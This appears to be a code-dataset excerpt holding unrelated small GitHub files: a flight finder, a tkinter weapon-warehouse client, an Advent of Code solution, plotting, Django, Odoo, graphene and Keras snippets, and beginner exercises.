giriş alıp doğrudan ve dolaylı uçuşları bulan bölüm\ndef main():\n origin = input(\"Başlangıç şehri girin: \")\n destination = input(\"Varış şehri girin: \")\n\n # Doğrudan uçuşları bul ve ekrana yazdır\n direct_flights_result = find_direct_flights(origin)\n if direct_flights_result:\n print(f\"Doğrudan uçuşlar: {direct_flights_result}\")\n else:\n print(f\"{origin} şehrinden doğrudan uçuş bulunmamaktadır.\")\n\n # Dolaylı uçuşları bul ve ekrana yazdır\n indirect_flights_result = find_indirect_flights(origin, destination)\n if indirect_flights_result:\n print(\"Dolaylı uçuşlar:\")\n for flight in indirect_flights_result:\n print(\" -> \".join(flight))\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"ibrahimfevzi/cpp-learning-journey","sub_path":"amadeus/ders.py","file_name":"ders.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"5164224006","text":"import tkinter as tk\r\nfrom tkinter import messagebox\r\nimport requests\r\nimport re\r\nimport json\r\n\r\n\r\nclass UpdateSwordPopup(tk.Frame):\r\n \"\"\" Popup Frame to Add a Sword \"\"\"\r\n\r\n def __init__(self, parent, id, close_callback):\r\n \"\"\" Constructor \"\"\"\r\n\r\n self._id = id\r\n url = \"http://127.0.0.1:5000/weaponwarehouse/weapons/\" + id\r\n response = requests.get(url)\r\n\r\n sword = json.loads(response.content)\r\n\r\n tk.Frame.__init__(self, parent)\r\n self._close_cb = close_callback\r\n self.grid(rowspan=2, columnspan=3)\r\n\r\n tk.Label(self, text=\"Name:\").grid(row=3, column=1)\r\n name_text = tk.StringVar()\r\n name_text.set(sword[\"name\"])\r\n self._name = 
tk.Entry(self, textvariable=name_text)\r\n self._name.grid(row=3, column=2)\r\n\r\n tk.Label(self, text=\"Materials:\").grid(row=4, column=1)\r\n materials_text = tk.StringVar()\r\n materials_text.set(sword[\"materials\"])\r\n self._materials = tk.Entry(self, textvariable=materials_text)\r\n self._materials.grid(row=4, column=2)\r\n\r\n tk.Label(self, text=\"Cold Weapon:\").grid(row=5, column=1)\r\n self._is_cold_weapon = tk.BooleanVar()\r\n radio1 = tk.Radiobutton(self, text=\"Yes\", value=True, variable=self._is_cold_weapon)\r\n radio1.grid(row=5, column=2)\r\n radio2 = tk.Radiobutton(self, text=\"No\", value=False, variable=self._is_cold_weapon)\r\n radio2.grid(row=5, column=3)\r\n self._is_cold_weapon.set(sword[\"is_cold_weapon\"])\r\n\r\n tk.Label(self, text=\"Inuse:\").grid(row=6, column=1)\r\n self._is_inuse = tk.BooleanVar()\r\n radio3 = tk.Radiobutton(self, text=\"Yes\", value=True, variable=self._is_inuse)\r\n radio3.grid(row=6, column=2)\r\n radio4 = tk.Radiobutton(self, text=\"No\", value=False, variable=self._is_inuse)\r\n radio4.grid(row=6, column=3)\r\n self._is_inuse.set(sword[\"is_inuse\"])\r\n\r\n tk.Label(self, text=\"Manufacture Date:\").grid(row=7, column=1)\r\n manufacture_date_text = tk.StringVar()\r\n manufacture_date_text.set(sword[\"manufacture_date\"])\r\n self._manufacture_date = tk.Entry(self, textvariable=manufacture_date_text)\r\n self._manufacture_date.grid(row=7, column=2)\r\n\r\n tk.Label(self, text=\"Sharp:\").grid(row=8, column=1)\r\n sharp_float = tk.DoubleVar()\r\n sharp_float.set(sword[\"sharp\"])\r\n self._sharp = tk.Entry(self, textvariable=sharp_float)\r\n self._sharp.grid(row=8, column=2)\r\n\r\n tk.Label(self, text=\"Length:\").grid(row=9, column=1)\r\n length_float = tk.DoubleVar()\r\n length_float.set(sword[\"length\"])\r\n self._length = tk.Entry(self, textvariable=length_float)\r\n self._length.grid(row=9, column=2)\r\n\r\n tk.Label(self, text=\"Double Edged:\").grid(row=10, column=1)\r\n self._is_double_edged = tk.BooleanVar()\r\n radio5 = tk.Radiobutton(self, text=\"Yes\", value=True, variable=self._is_double_edged)\r\n radio5.grid(row=10, column=2)\r\n radio6 = tk.Radiobutton(self, text=\"No\", value=False, variable=self._is_double_edged)\r\n radio6.grid(row=10, column=3)\r\n self._is_double_edged.set(sword[\"is_double_edged\"])\r\n\r\n tk.Button(self, text=\"Submit\", command=self._submit_cb).grid(row=11, column=1)\r\n tk.Button(self, text=\"Close\", command=self._close_cb).grid(row=11, column=2)\r\n\r\n def _submit_cb(self):\r\n \"\"\" Submit the Add sword \"\"\"\r\n\r\n # Validate the non-string data values\r\n if re.match(\"^\\d{4}-\\d{2}-\\d{2}$\", self._manufacture_date.get()) is None:\r\n messagebox.showerror(\"Error\", \"Received date must have format yyyy-mm-dd\")\r\n return\r\n\r\n if re.match(\"^\\s*(?=.*[1-9])\\d*(?:\\.\\d{1,2})?\\s*$\", self._sharp.get()) is None:\r\n messagebox.showerror(\"Error\", \"Range must be a valid float\")\r\n return\r\n\r\n if re.match(\"^\\s*(?=.*[1-9])\\d*(?:\\.\\d{1,2})?\\s*$\", self._length.get()) is None:\r\n messagebox.showerror(\"Error\", \"Range must be a valid float\")\r\n return\r\n\r\n # Create the dictionary for the JSON request body\r\n data = {}\r\n data['name'] = self._name.get()\r\n data['materials'] = self._materials.get()\r\n data['is_cold_weapon'] = self._is_cold_weapon.get()\r\n data['is_inuse'] = int(self._is_inuse.get())\r\n data['manufacture_date'] = self._manufacture_date.get()\r\n data['sharp'] = self._sharp.get()\r\n data['length'] = self._length.get()\r\n 
data['is_double_edged'] = self._is_double_edged.get()\r\n data['type'] = \"Sword\"\r\n\r\n self._update_sword(data)\r\n\r\n # Implement your code here\r\n def _update_sword(self, data):\r\n \"\"\" update a sword to the backend grid \"\"\"\r\n url = \"http://127.0.0.1:5000/weaponwarehouse/weapons/\" + self._id\r\n headers = {\"content-type\": \"application/json\"}\r\n response = requests.put(url, json=data, headers=headers)\r\n\r\n if response.status_code == 200:\r\n self._close_cb()\r\n else:\r\n messagebox.showerror(\"Error\", \"Cannot update sword because: \" + response.text)\r\n self.focus_get()\r\n","repo_name":"JIAJUNATBCIT/Warehouse-App","sub_path":"update_sword_popup.py","file_name":"update_sword_popup.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7484499588","text":"from models.TGTime import TGTime\n\n\nclass PersonalityWorkContract(object):\n def __init__(self, start_t: TGTime, end_t: TGTime, worker_id: str,\n receiver_company_id: str,\n receiver_property_id: str,\n work_days: list[int],\n one_time_payment: int,\n salary_monthly: int,\n provider_company_id: str = None,\n provider_property_id: str = None,):\n self.start_t = start_t\n self.end_t = end_t\n self.worker_id = worker_id\n self.provider_company_id = provider_company_id\n self.provider_property_id = provider_property_id\n self.receiver_company_id = receiver_company_id\n self.receiver_property_id = receiver_property_id\n self.work_days = work_days\n self.one_time_payment = one_time_payment\n self.salary_monthly = salary_monthly\n","repo_name":"SierraW/TradingGameServer","sub_path":"models/cities/personality/PersonalityWorkContract.py","file_name":"PersonalityWorkContract.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"14975495973","text":"import matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport datetime as dt\nimport matplotlib\nimport csv\n\nmatplotlib.use(\"AGG\")\n\nx = []\neCO2 = []\nTVOC = []\n\npath = \"data/\" + \"2021-07-03_air_quality.csv\"\n\nwith open(path, 'r') as csvfile:\n lines = csv.reader(csvfile, delimiter=',')\n # Skip header\n next(lines)\n for row in lines:\n x.append(row[0])\n eCO2.append(int(row[1]))\n TVOC.append(int(row[2]))\n\n\nformat = \"%H:%M:%S\"\nxfmt = mdates.DateFormatter(\"%H:%M\")\n\n\ndef convertTime(time):\n return dt.datetime.strptime(time, format)\n\n\ntimes = list(map(convertTime, x))\n\nfig, axs = plt.subplots(2, 1)\n\ncoPlot = axs[0]\nvocPlot = axs[1]\n\ncoPlot.plot(times, eCO2, color='g', linestyle='solid',\n label=\"CO2\", marker=\"\")\nvocPlot.plot(times, TVOC, color='g', linestyle='solid',\n marker='', label=\"TVOC\")\n\ncoPlot.xaxis.set_major_formatter(xfmt)\nvocPlot.xaxis.set_major_formatter(xfmt)\n\ncoPlot.axhline(500)\nvocPlot.axhline(50)\ncoPlot.set(ylabel=\"eCO2 (ppm)\")\nvocPlot.set(ylabel='TVOC (ppb)', xlabel=\"Tid\")\ncoPlot.set_title('2021-07-03', fontsize=20)\ncoPlot.grid()\nvocPlot.grid()\n\nplt.savefig(\"image.png\")\n","repo_name":"simonvea/air_quality","sub_path":"createPlot.py","file_name":"createPlot.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13398284362","text":"\"\"\"\nCreated on Mon Dec 7 20:13:04 2022\n\n@author: AllenKll\n--- Day 5: Supply Stacks ---\n--- Part Two ---\nAs you watch the crane operator expertly 
rearrange the crates, you notice the process isn't following your prediction.\n\nSome mud was covering the writing on the side of the crane, and you quickly wipe it away. The crane isn't a CrateMover 9000 - it's a CrateMover 9001.\n\nThe CrateMover 9001 is notable for many new and exciting features: air conditioning, leather seats, an extra cup holder, and the ability to pick up and move multiple crates at once.\n\nAgain considering the example above, the crates begin in the same configuration:\n\n [D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \nMoving a single crate from stack 2 to stack 1 behaves the same as before:\n\n[D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \nHowever, the action of moving three crates from stack 1 to stack 3 means that those three moved crates stay in the same order, resulting in this new configuration:\n\n [D]\n [N]\n [C] [Z]\n [M] [P]\n 1 2 3\nNext, as both crates are moved from stack 2 to stack 1, they retain their order as well:\n\n [D]\n [N]\n[C] [Z]\n[M] [P]\n 1 2 3\nFinally, a single crate is still moved from stack 1 to stack 2, but now it's crate C that gets moved:\n\n [D]\n [N]\n [Z]\n[M] [C] [P]\n 1 2 3\nIn this example, the CrateMover 9001 has put the crates in a totally different order: MCD.\n\nBefore the rearrangement process finishes, update your simulation so that the Elves know where they should stand to be ready to unload the final supplies. After the rearrangement procedure completes, what crate ends up on top of each stack?\n\nYour puzzle answer was TZLTLWRNF.\n\n\n\n\"\"\"\nfrom collections import deque\n\nfile = open(\"input.txt\", \"r\") # , newline='\\r\\n')\n# file = open(\"debug.txt\", \"r\" ) #, newline='\\r\\n')\nline = file.readline()\n\n#reading in the starting positions would be a pain in the ass due to the format, so we will hard code them.\n\"\"\"\n[M] [N] [Z] \n[F] [R] [Z] [C] [C] \n[C] [V] [L] [N] [G] [V] \n[W] [L] [T] [H] [V] [F] [H]\n[T] [T] [W] [F] [B] [P] [J] [L]\n[D] [L] [H] [J] [C] [G] [S] [R] [M]\n[L] [B] [C] [P] [S] [D] [M] [Q] [P]\n[B] [N] [J] [S] [Z] [W] [F] [W] [R]\n 1 2 3 4 5 6 7 8 9 \n\"\"\"\n\nstacks = []\nstacks.append( list('MFCWTDLB'))\nstacks.append( list('LBN'))\nstacks.append( list('VLTHCJ'))\nstacks.append( list('WJPS'))\nstacks.append( list('RLTFCSZ'))\nstacks.append( list('ZNHBGDW'))\nstacks.append( list('NCGVPSMF'))\nstacks.append( list('ZCVFJRQW'))\nstacks.append( list('HLMPR'))\n\ndef doMove(fromStack, toStack, numItems):\n moving = stacks[fromStack-1][:numItems]\n del(stacks[fromStack-1][:numItems])\n stacks[toStack-1] = moving + stacks[toStack-1]\n\nlineNumber = 11\n\nwhile line:\n line = line.strip()\n \n if not \"move\" in line:\n line = file.readline()\n continue\n \n splt = line.split(' ')\n numItems = eval(splt[1])\n fromStack = eval(splt[3])\n toStack = eval(splt[5])\n\n doMove(fromStack, toStack, numItems)\n\n line = file.readline()\n lineNumber = lineNumber + 1\n\noutput = []\nfor stack in stacks:\n output.append(stack[0])\n\nprint(\"\".join(output))","repo_name":"AllenKll/Banano-Advent-of-Code-2022","sub_path":"Day5/Part2.py","file_name":"Part2.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44887795518","text":"class autobuses:\n sTarifa = 1.20\n def __init__(self, c_model = \"\", c_capacidad = 0, c_ruta = \"\"):\n self.model = c_model\n self.capacidad = c_capacidad\n self.ruta = c_ruta\n\na = autobuses(\"mercedaco\", 3000, \"pol poblao\")\nprint(a.sTarifa)\na.sTarifa = 300\nprint(a.sTarifa)\nb = 
autobuses(\"citroen\", 5, \"viladecans\")\nautobuses.sTarifa = 400\nprint(autobuses.sTarifa)\nprint(a.sTarifa)\nprint(b.sTarifa)\n","repo_name":"alexcatmu/CFGS_DAM","sub_path":"SEGUNDO/M3-POOpython/ejercicios/clases_atributos/autobuses.py","file_name":"autobuses.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1220961075","text":"from django.urls import path, include\nfrom .views import *\n\nurlpatterns = [\n\t# path('', views.index, name='index'),\n\tpath('signup/', SignupView.as_view(), name='signup'),\n\tpath('login/', LoginView.as_view(), name='login'),\n\tpath('file-upload/', FileUpload.as_view(), name='file-upload'),\n\tpath('file-listing/', MyFile.as_view(), name='file-listing'),\n]\n","repo_name":"ryan191188/file-sensitivity","sub_path":"fapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10915535347","text":"import random\nimport numpy as np\nimport torch\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.data import Dataset, DataLoader\n\ndef get_cat_cont_feats(df,contfeats):\n \n categorical = df.drop(['target'] + contfeats,\n axis=1).columns\n\n return categorical,contfeats\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n \n torch.manual_seed(seed)\n torch.backends.cudnn.deterministick = True\n torch.backends.cudnn.benchmark = False \n\n\ndef split_dataset(trainset, valid_size=0.2, batch_size=64):\n num_train = len(trainset)\n \n indices = list(range(num_train))\n np.random.shuffle(indices)\n \n split = int(np.floor(valid_size * num_train))\n \n valid_idx, train_idx = indices[:split], indices[split:]\n \n valid_sampler = SubsetRandomSampler(valid_idx)\n train_sampler = SubsetRandomSampler(train_idx)\n \n valid_loader = DataLoader(trainset, \n batch_size=batch_size, \n sampler=valid_sampler)\n train_loader = DataLoader(trainset, \n batch_size=batch_size, \n sampler=train_sampler)\n \n return train_loader, valid_loader\n\n\ndef cat_dim(all_df,cats):\n \n embedding_cardinality = {n: c.nunique()+1 for n,c in all_df[cats].items()}\n emb_sizes = [(size, max(5, size//2)) for item, size in embedding_cardinality.items()]\n\n return emb_sizes\n\n ","repo_name":"Nandhagopalan/Structuring_Projects","sub_path":"Pytorch_Framework/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31068334835","text":"from odoo import fields, models\n\n\nclass Moderation(models.Model):\n _name = 'mail.moderation'\n _description = 'Channel black/white list'\n\n email = fields.Char(string=\"Email\", index=True, required=True)\n status = fields.Selection([\n ('allow', 'Always Allow'),\n ('ban', 'Permanent Ban')],\n string=\"Status\", required=True)\n channel_id = fields.Many2one('mail.channel', string=\"Channel\", index=True, required=True)\n\n _sql_constraints = [\n ('channel_email_uniq', 'unique (email,channel_id)', 'The email address must be unique per channel !')\n ]\n","repo_name":"Kinal-dev/crm","sub_path":"addons/mail/models/mail_moderation.py","file_name":"mail_moderation.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37236052978","text":"nota1 = 3.4 # primera nota\nnota2 = 
4\nnota3 = 2.6\nnota4 = 4.7\n\npromedio = ((nota1 + nota2 + nota3 + nota4)/4)\n\nprint(promedio)\n\ndef cal_promedio(n1,n2,n3,n4):\n result = ((n1 + n2 + n3 + n4)/4)\n result = round(result,3)\n # return \"el promedio de las notas es : \" + str(result)\n return \"el promedio de las notas es : \" + str(result)\n\n\nprint(cal_promedio(nota1, nota2, nota3, nota4))\n\n\ndef cal_promedio_tu(list_notas):\n result = (sum(list_notas)/len(list_notas))\n return result\n\nnotas = (3.4,4,2.6,4.7)\nnotas_antes = (3.4,4,2.6,4.7,2.5)\n\nmi_result_tu = cal_promedio_tu(notas_antes)\nprint(mi_result_tu)\nprint(type(notas))","repo_name":"Juliancamilo97/EJERCICIOS-1.py","sub_path":"Ejercicio5.py","file_name":"Ejercicio5.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21575558807","text":"\nfrom django import template\n\nfrom apps.notification.models import notification\n\nregister = template.Library()\n\n@register.filter\ndef has_unread_notif(user):\n notifications = notification.objects.filter(user__Username__username=user, status=False)\n print(notifications)\n if notifications.exists():\n return True\n return False","repo_name":"Nidhip859/Flamboyant","sub_path":"apps/notification/templatetags/notification_tags.py","file_name":"notification_tags.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25698166842","text":"from __future__ import absolute_import, division, print_function, unicode_literals\r\nfrom tensorflow import keras\r\nimport ImageProcessor as ip\r\n\r\ndef convertSciToFloat(numAsStr):\r\n try:\r\n if ('e' in numAsStr) & (len(numAsStr) > 0):\r\n x = numAsStr.split('e')\r\n return float(x[0]) * (10 ** float(x[1]))\r\n else:\r\n return float(numAsStr)\r\n except ValueError as e:\r\n return 0\r\n\r\ndef formatPredictions(predictions):\r\n predictionsAsString = \"\"\r\n for x in predictions:\r\n for y in x:\r\n predictionsAsString = predictionsAsString + str(y) + \",\"\r\n predictionsAsString = predictionsAsString + \"|\"\r\n return predictionsAsString\r\n\r\ntrain_images = ip.train_nparray\r\ntrain_labels = ip.train_labels\r\ntest_images = ip.validation_nparray\r\ntest_labels = ip.validation_labels\r\n\r\nmodel = keras.Sequential([\r\n keras.layers.Flatten(input_shape=(168, 300, 3)),\r\n keras.layers.Dense(128, activation='relu'),\r\n keras.layers.Dense(10, activation='softmax')\r\n])\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(train_images, train_labels, epochs=10)\r\n\r\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\r\n\r\nprint('\\n\\nTest accuracy: %{0}\\n\\n'.format(test_acc * 100))\r\n\r\n\r\ndef runTest():\r\n print(\"Test should find two Closed and one Open\")\r\n predictions = model.predict(test_images)\r\n predictionsAsString = formatPredictions(predictions)\r\n predictionsStringList = predictionsAsString.split(\"|\")\r\n predictions = []\r\n testPredictionsIndex = []\r\n for x in predictionsStringList:\r\n predictions.append([convertSciToFloat(y) for y in x.split(\",\")])\r\n predictions = [x for x in predictions if len(x) > 1]\r\n for x in predictions:\r\n testPredictionsIndex.append(x.index(max(x)))\r\n for x in testPredictionsIndex:\r\n print([\"Closed\", 
\"Open\"][x])\r\n","repo_name":"MarkHauen/ImageLearning","sub_path":"Predictor.py","file_name":"Predictor.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70161503324","text":"# def 函数名:\n# 函数体\n# 函数名()\n\n# 函数必须先定义才能使用\n\n# 默认参数\ndef one(name, sex, age=16, city='北京'):\n print(name, sex, age, city)\n\n\n# one('bod', '男', 10)\n#\n# one('sd', 'girl', city='上海')\n\n# 可变参数\n\ndef two(*arg):\n print(arg)\n\n\ntwo(1, 2, 3)\na = [1, 2, 3, 4]\nb = (1, 2, 3, 4)\nc = {\n \"a\": 1,\n \"b\": 2\n}\ntwo(*a)\ntwo(*b)\ntwo(c)\n\n\n# 关键字 参数\n\n# def 函数名( 参数,参数,**关键字):\n# 函数体\n# 函数名(参数,参数,键='值')\n\ndef start(name, age, **kwargs):\n print(name, age, kwargs)\n\n\nstart('yang', 23, sex='boy', hight=178)\n\nkw = {\n 'sex': 'boy',\n 'height': 176\n}\nstart('yang', 23, **kw)\n\n\n# 函数返回值\n# 函数体中 没有 return 函数的返回值是 none\n# 函数体中 返回多个值 用逗号 分隔 返回值的类型是一个元组 例如: return 字符串,数值,列表,元组,字典 。。。。。\n\n","repo_name":"yang529593122/python_study","sub_path":"study_01/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23373250843","text":"class Solution:\n def frequencySort(self, s: str) -> str:\n d = {}\n for c in s:\n if c not in d:\n d[c] = 1\n else:\n d[c] += 1\n res = \"\"\n a = sorted(d.items(), key=lambda x: x[1], reverse=True)\n for k,v in a:\n res += k*v\n return res","repo_name":"zzz0906/LeetCode","sub_path":"Scripts/451.py","file_name":"451.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"86"} +{"seq_id":"34487464776","text":"# luiz.augusto.farias@ccc.ufcg.edu.br \n\ndef move_direita(labirinto):\n for i in range(len(labirinto)):\n for j in range(len(labirinto[0])):\n if labirinto[i][j] == '*' and labirinto[i][j + 1] == ' ':\n labirinto[i][j], labirinto[i][j + 1] = labirinto[i][j + 1], labirinto[i][j]\n return (i , j + 1)\n \n if labirinto[i][j] == '*' and labirinto[i][j + 1] != ' ':\n resultado = (i, j)\n break\n \n return resultado\n\nlabirinto1 = [\n ['P', '*', ' ', ' '],\n ['P', ' ', 'P', ' '],\n ['P', 'P', 'P', ' '],\n]\n\nassert move_direita(labirinto1) == (0, 2)\n\nassert labirinto1 == [\n ['P', ' ', '*', ' '],\n ['P', ' ', 'P', ' '],\n ['P', 'P', 'P', ' '],\n]\n\nlabirinto2 = [\n ['P', 'P', ' ', ' '],\n ['P', '*', 'P', ' '],\n ['P', 'P', 'P', ' '],\n]\nassert move_direita(labirinto2) == (1, 1)","repo_name":"luizaugustoliveira/Algoritmos","sub_path":"Matrizes/labir_move_direita/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73661039004","text":"import kenlm\nimport streamlit as st\nfrom lm import *\n\n# load and prepare model to correct words\nmodel = kenlm.LanguageModel(\"language_model/airi.bin\")\nmodel.vocab = prepare_unigram_set(\"language_model/airi.arpa\", model)\n\nst.header(\"Text corrector\")\n# Store the initial value of widgets in session state\nst.session_state.visibility = \"visible\"\nst.session_state.disabled = False\n\ncol1, col2 = st.columns(2)\n\nwith col1:\n st.write(\"Your input sentence:\")\n input_sentence = st.text_area(\n label=\"Enter sentence\",\n height=200\n )\n if input_sentence:\n with col2:\n st.write(\"Corrected sentence:\")\n st.session_state.disabled = True\n text_input = st.text_area(\n label=\"result\",\n 
value=recycle_sentence(model, input_sentence),\n label_visibility=st.session_state.visibility,\n disabled=st.session_state.disabled,\n height=200\n )\n ","repo_name":"shoxa0707/Text-Corrector-With-Kenlm","sub_path":"stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21865973957","text":"import graphene\nfrom graphene_django.filter import DjangoFilterConnectionField\n\nfrom . import filters\n\nfrom .resolvers import (\n resolve_cash_flow,\n resolve_cash_flows,\n resolve_company_cashbox,\n resolve_company_cashboxs,\n resolve_holding_cashbox,\n resolve_holding_cashboxs,\n resolve_office_cashbox,\n resolve_office_cashboxs\n)\n\nfrom . types import (\n HoldingCashboxNode,\n CompanyCashboxNode,\n OfficeCashboxNode,\n CashFlowNode\n)\n\nfrom .mutations import (\n company_cashbox_mutations,\n holding_cashbox_mutations,\n office_cashbox_mutations\n)\n\nfrom core.permissions import IsAdminUser\nfrom django_graphene_permissions import permissions_checker\nfrom api.cashbox.permissions import (\n company_cashbox_permissions,\n holding_cashbox_permissions,\n office_cashbox_permissions,\n cash_flow_permissions\n)\n\n\nclass HoldingCashboxQuery(graphene.ObjectType):\n holding_cashbox = graphene.Field(HoldingCashboxNode, description=\"Look up a holding cashbox by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a holding cashbox\", required=True))\n\n holding_cashboxs = DjangoFilterConnectionField(\n HoldingCashboxNode,\n description=\"List of holding cashboxs.\",\n filterset_class=filters.HoldingCashboxFilter,\n )\n\n @permissions_checker([holding_cashbox_permissions.HoldingCashboxReadPermissions])\n def resolve_holding_cashbox(self, info, **data):\n id = data.get(\"id\")\n return resolve_holding_cashbox(id)\n\n @permissions_checker([holding_cashbox_permissions.HoldingCashboxReadPermissions])\n def resolve_holding_cashboxs(self, info, **_kwargs):\n return resolve_holding_cashboxs()\n\n\nclass CompanyCashboxQuery(graphene.ObjectType):\n company_cashbox = graphene.Field(CompanyCashboxNode, description=\"Look up a company cashbox by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a company cashbox\", required=True))\n\n company_cashboxs = DjangoFilterConnectionField(\n CompanyCashboxNode,\n description=\"List of company cashboxs.\",\n filterset_class=filters.CompanyCashboxFilter,\n )\n\n @permissions_checker([company_cashbox_permissions.CompanyCashboxReadPermissions])\n def resolve_company_cashbox(self, info, **data):\n id = data.get(\"id\")\n return resolve_company_cashbox(id)\n\n @permissions_checker([company_cashbox_permissions.CompanyCashboxReadPermissions])\n def resolve_company_cashboxs(self, info, **_kwargs):\n return resolve_company_cashboxs()\n\n\nclass OfficeCashboxQuery(graphene.ObjectType):\n office_cashbox = graphene.Field(OfficeCashboxNode, description=\"Look up a office cashbox by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a office cashbox\", required=True))\n\n office_cashboxs = DjangoFilterConnectionField(\n OfficeCashboxNode,\n description=\"List of office cashboxs.\",\n filterset_class=filters.OfficeCashboxFilter,\n )\n\n @permissions_checker([office_cashbox_permissions.OfficeCashboxReadPermissions])\n def resolve_office_cashbox(self, info, **data):\n id = data.get(\"id\")\n return resolve_office_cashbox(id)\n\n @permissions_checker([office_cashbox_permissions.OfficeCashboxReadPermissions])\n def 
resolve_office_cashboxs(self, info, **_kwargs):\n return resolve_office_cashboxs()\n\nclass CashFlowQuery(graphene.ObjectType):\n cash_flow = graphene.Field(CashFlowNode, description=\"Look up a cash flow by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a cash flow\", required=True))\n\n cash_flows = DjangoFilterConnectionField(\n CashFlowNode,\n description=\"List of cash flows.\",\n filterset_class=filters.CashFlowFilter,\n )\n\n @permissions_checker([cash_flow_permissions.CashFlowReadPermissions])\n def resolve_cash_flow(self, info, **data):\n id = data.get(\"id\")\n return resolve_cash_flow(id)\n\n @permissions_checker([cash_flow_permissions.CashFlowReadPermissions])\n def resolve_cash_flows(self, info, **_kwargs):\n return resolve_cash_flows()\n \n# ----------------------- Mutations ---------------------------------------\n\n\nclass HoldingCashboxMutations(graphene.ObjectType):\n create_holding_cashbox = holding_cashbox_mutations.CreateHoldingCashbox.Field()\n update_holding_cashbox = holding_cashbox_mutations.UpdateHoldingCashbox.Field()\n \nclass CompanyCashboxMutations(graphene.ObjectType):\n create_company_cashbox = company_cashbox_mutations.CreateCompanyCashbox.Field()\n update_company_cashbox = company_cashbox_mutations.UpdateCompanyCashbox.Field()\n \nclass OfficeCashboxMutations(graphene.ObjectType):\n create_office_cashbox = office_cashbox_mutations.CreateOfficeCashbox.Field()\n update_office_cashbox = office_cashbox_mutations.UpdateOfficeCashbox.Field()\n ","repo_name":"abbasguliyev/erp_graphql_api","sub_path":"app/api/cashbox/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4464799795","text":"\r\ndef userinput() :\r\n while True :\r\n try :\r\n user_input = input(\"날짜를 입력하세요. 
ex)20020304 :\")\r\n if len(user_input) != 8 :\r\n print(\"년월일 포함 8자리로 입력해주세요\")\r\n continue\r\n year = int(user_input[:4])\r\n month = int(user_input[4:6])\r\n day = int(user_input[6:])\r\n break\r\n except :\r\n print(\"Please enter numeric input.\")\r\n return year, month, day\r\n\r\ndef is_month_change(x, y, z) : # 30 or 31일이 넘으면 True값 반환\r\n a = [i for i in range(1, 13)]\r\n b = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n if y in a :\r\n day_in_month = b[a.index(y)]\r\n if z > day_in_month:\r\n return True\r\n else:\r\n return False\r\n\r\ndef calender_2022(x, y, z) : # 윤년을 고려하지 않은 달력\r\n a = [i for i in range(1, 13)]\r\n b = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n if y in a :\r\n for i in range(0, a.index(y)) :\r\n z = z + b[i]\r\n day_of_week = [\"월\", \"화\", \"수\", \"목\", \"금\", \"토\", \"일\"]\r\n # jan_1st = day_of_week[5]\r\n find_day = (x - 2022 + 5 + z - 1) % 7\r\n d = day_of_week[find_day]\r\n return d\r\n\r\ndef calculate(x, y, z) : # 100일 계산기\r\n for i in range(100) :\r\n z += 1 # 날짜에 +1씩 더함\r\n if is_month_change(x, y, z) : # 30 or 31 이 넘으면 월+1\r\n z = 1\r\n y += 1\r\n if y > 12 : # 12월이 넘으면 연+1\r\n y = 1\r\n x += 1\r\n return x, y, z\r\n\r\nyear, month, day = userinput()\r\ninput_day = (calender_2022(year, month, day))\r\na, b, c = calculate(year, month, day)\r\nd = (calender_2022(a, b, 